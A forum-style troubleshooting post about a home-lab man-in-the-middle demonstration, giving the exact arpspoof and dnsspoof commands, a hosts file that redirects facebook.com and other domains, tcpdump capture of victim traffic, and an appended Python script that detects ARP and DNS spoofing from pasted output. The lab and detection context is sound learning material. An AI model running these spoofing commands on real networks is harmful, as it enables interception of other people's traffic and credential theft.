
Cannot consistently demonstrate ARP Spoof and DNS Spoof?

Çağlar Arlı

I am trying to use arpspoof and dnsspoof to practice a man-in-the-middle attack between a couple of computers at home. Despite repeatedly following the same exact steps below, I cannot get consistent results. Sometimes I am successful performing the man-in-the-middle spoof, other times I am not. At this point, my guess is that maybe there is some kind of caching with the tools I am using? Or a race condition of some kind? I have no idea and am looking for feedback.

Here is my setup.

I have a wifi network called LearningMITM2. The gateway is 192.168.10.1.

I have a laptop computer with Windows 10 logged into the LearningMITM2 network.

On Windows command prompt, I typed ipconfig and it shows this:

...etc...
Wireless LAN adapter Wi-Fi 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::1f19:bef3:35b0:7e1e%8
   IPv4 Address. . . . . . . . . . . : 192.168.10.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.10.1
...etc...

On Windows command prompt, I typed arp -a and it shows this:

...etc...
Interface: 192.168.10.100 --- 0x8
  Internet Address      Physical Address      Type
  192.168.10.1          c0-a0-bb-c7-e8-66     dynamic
  192.168.10.102        08-00-27-d3-ca-32     dynamic
  192.168.10.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static


I have VirtualBox installed and a guest operating system of Ubuntu 22.04 installed on it. I open up an SSH terminal connection to this Ubuntu. On the Ubuntu Bash command prompt I typed ip a and it shows this:


1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:d3:ca:32 brd ff:ff:ff:ff:ff:ff
    inet 192.168.10.102/24 metric 100 brd 192.168.10.255 scope global dynamic enp0s3
       valid_lft 74708sec preferred_lft 74708sec
    inet6 fe80::a00:27ff:fed3:ca32/64 scope link
       valid_lft forever preferred_lft forever

I open two Ubuntu Bash terminal windows and type this to begin MITM:

apt-get install -y dsniff net-tools apache2;
echo 1 > /proc/sys/net/ipv4/ip_forward;

# window 1
arpspoof -i enp0s3 -t 192.168.10.1 192.168.10.100
# gives 8:0:27:d3:ca:32 c0:a0:bb:c7:e8:66 0806 42: arp reply 192.168.10.100 is-at f8:16:54:9b:70:da

# window 2
arpspoof -i enp0s3 -t 192.168.10.100 192.168.10.1
# gives 8:0:27:d3:ca:32 f8:16:54:9b:70:da 0806 42: arp reply 192.168.10.1 is-at c0:a0:bb:c7:e8:66

From my Windows Command Prompt, I confirm that the MAC address for the gateway is something else by typing arp -a.

Interface: 192.168.10.100 --- 0x8
  Internet Address      Physical Address      Type
  192.168.10.1          08-00-27-d3-ca-32     dynamic
  192.168.10.102        08-00-27-d3-ca-32     dynamic
  192.168.10.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static

On the ubuntu machine, I make the file mitm with this content:

demo.learning.com 192.168.10.102
192.168.10.102 demo.learning.com

Then I run the command dnsspoof -i enp0s3 -f mitm.

Then from the command prompt of my Windows machine, I type ping demo.learning.com. Sometimes the result is that ping shows it reaches 192.168.10.102. But if I repeat the exact same steps again, I might get a Ping request could not find host demo.learning.com. I get the same unpredictable behaviour when I visit http://demo.learning.com from my Windows web browsers after repeating the steps above: sometimes I get the default web page of the Apache server on 192.168.10.102, and other times I get a time-out.

The steps above do NOT produce consistent outcomes. I tried waiting longer between commands, I tried going on a lunch break, I tried restarting my computer, etc... but the outcomes are never consistent... sometimes it works, sometimes it doesn't.

What am I doing that's causing this inconsistency? What do I need to do differently to consistently and successfully perform a man-in-the-middle attack demonstration?


MORE FINDINGS

I just discovered even more interesting situations. I updated the mitm file to have these contents:

demo.learning.com 192.168.10.102
192.168.10.102 demo.learning.com

facebook.com 192.168.10.102
192.168.10.102 facebook.com

blue.com 192.168.10.102
192.168.10.102 blue.com

In other words, I added more entries. Then after following the exact steps in the original post, but using this latest mitm file for my dnsspoof command, I notice that it's completely random when and which domains will give me a ping response back from 192.168.10.102, or when it would give me the actual response from the public internet (either the actual IP in the public internet or time-out because it doesn't actually exist on the internet). For example after running the command dnsspoof -i enp0s3 -f mitm, then I might get results like this:

ping facebook.com
# gives a response from 192.168.10.102

ping demo.learning.com
# gives a time out

ping blue.com
# gives a response from 64.190.63.222

If I repeat all my steps, then I might get something like:

ping facebook.com
# gives a response from 31.13.80.36

ping demo.learning.com
# gives a response from 192.168.10.102

ping blue.com
# gives a response from 192.168.10.102

Running commands like arp -d *, ipconfig /flushdns or ip -s -s neigh flush all before each experiment does not seem to have any effect on my demonstrations.


UPDATE July 1, 2024

I noticed now that arpspoof -i enp0s3 ..etc.. consistently works 100% of the time. After the man-in-the-middle machine 192.168.10.102 runs the arpspoof command, the same machine can run tcpdump -i enp0s3 -A tcp port 80 or tcp port 443 and see the victim's traffic come through. It is only the dnsspoof that is inconsistent. I may need to restart it a few times before it actually works.
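As an added example, not part of the original post: the two indicators visible in the post (the gateway's MAC in arp -a changing to the same MAC as 192.168.10.102, and a public name such as facebook.com resolving to a private address) can be checked on the Windows victim with a small script rather than read off by eye. The sample arp -a tables and the ping transcript below are constructed from the values in the post; the "Pinging <name> [<ip>]" line format is Windows ping's normal output and is assumed here. The checker only parses text that was pasted in; it does not send any traffic.

```python
"""Victim-side sanity checks for the ARP cache and DNS answers (added example,
not from the original post). Sample inputs are constructed from the post."""
import ipaddress
import re
from collections import defaultdict

# One row of Windows `arp -a`: "<ip>  <mac with dashes>  dynamic|static"
ARP_ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(dynamic|static)\s*$",
    re.IGNORECASE,
)
# Windows ping prints "Pinging <name> [<ip>] with 32 bytes of data:" on success
# and "Ping request could not find host <name>. ..." when resolution fails.
PING_RESOLVED = re.compile(r"^Pinging (\S+) \[(\d{1,3}(?:\.\d{1,3}){3})\]")
PING_NXDOMAIN = re.compile(r"^Ping request could not find host (\S+?)\.?(?:\s|$)")


def parse_arp_a(text):
    """Return {ip: mac} for the dynamic rows of `arp -a`; static multicast/broadcast rows are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_ROW.match(line)
        if m and m.group(3).lower() == "dynamic":
            table[m.group(1)] = m.group(2).lower()
    return table


def arp_findings(table, gateway_ip, expected_gateway_mac):
    """Flag a gateway MAC that differs from the known baseline and any MAC answering for several IPs."""
    findings = []
    gw_mac = table.get(gateway_ip)
    if gw_mac != expected_gateway_mac.lower():
        findings.append(f"gateway {gateway_ip} maps to {gw_mac}, expected {expected_gateway_mac}")
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(f"MAC {mac} claims several IPs: {', '.join(sorted(ips))}")
    return findings


def parse_ping(text):
    """Return {name: ip or None} from one or more pasted Windows ping transcripts."""
    results = {}
    for raw in text.splitlines():
        line = raw.strip()
        m = PING_RESOLVED.match(line)
        if m:
            results[m.group(1)] = m.group(2)
            continue
        m = PING_NXDOMAIN.match(line)
        if m:
            results[m.group(1)] = None  # name did not resolve at all
    return results


def dns_findings(results, local_names=()):
    """Flag names that are not expected to be local but resolved to a private (RFC 1918 etc.) address."""
    findings = []
    for name, ip in results.items():
        if ip is None or name in local_names:
            continue
        if ipaddress.ip_address(ip).is_private:
            findings.append(f"{name} resolved to private address {ip}")
    return findings


# Constructed samples, taken from the tables in the post (baseline, then after arpspoof).
ARP_BEFORE = """Interface: 192.168.10.100 --- 0x8
  Internet Address      Physical Address      Type
  192.168.10.1          c0-a0-bb-c7-e8-66     dynamic
  192.168.10.102        08-00-27-d3-ca-32     dynamic
  192.168.10.255        ff-ff-ff-ff-ff-ff     static
"""
ARP_AFTER = """Interface: 192.168.10.100 --- 0x8
  Internet Address      Physical Address      Type
  192.168.10.1          08-00-27-d3-ca-32     dynamic
  192.168.10.102        08-00-27-d3-ca-32     dynamic
  192.168.10.255        ff-ff-ff-ff-ff-ff     static
"""
# Constructed ping transcript matching the first set of results in "MORE FINDINGS".
PING_RUN = """Pinging facebook.com [192.168.10.102] with 32 bytes of data:
Reply from 192.168.10.102: bytes=32 time=1ms TTL=64
Ping request could not find host demo.learning.com. Please check the name and try again.
Pinging blue.com [64.190.63.222] with 32 bytes of data:
"""

if __name__ == "__main__":
    baseline_mac = "c0-a0-bb-c7-e8-66"  # gateway MAC recorded from the first arp -a
    for label, table in (("before", ARP_BEFORE), ("after", ARP_AFTER)):
        print(label, arp_findings(parse_arp_a(table), "192.168.10.1", baseline_mac))
    print("dns", dns_findings(parse_ping(PING_RUN), local_names={"demo.learning.com"}))
```

The baseline gateway MAC has to be recorded while the cache is known good (the first arp -a in the post), since the check is only as trustworthy as that reference; demo.learning.com is passed as a local name so that a private answer for it is not flagged, while the same answer for facebook.com is.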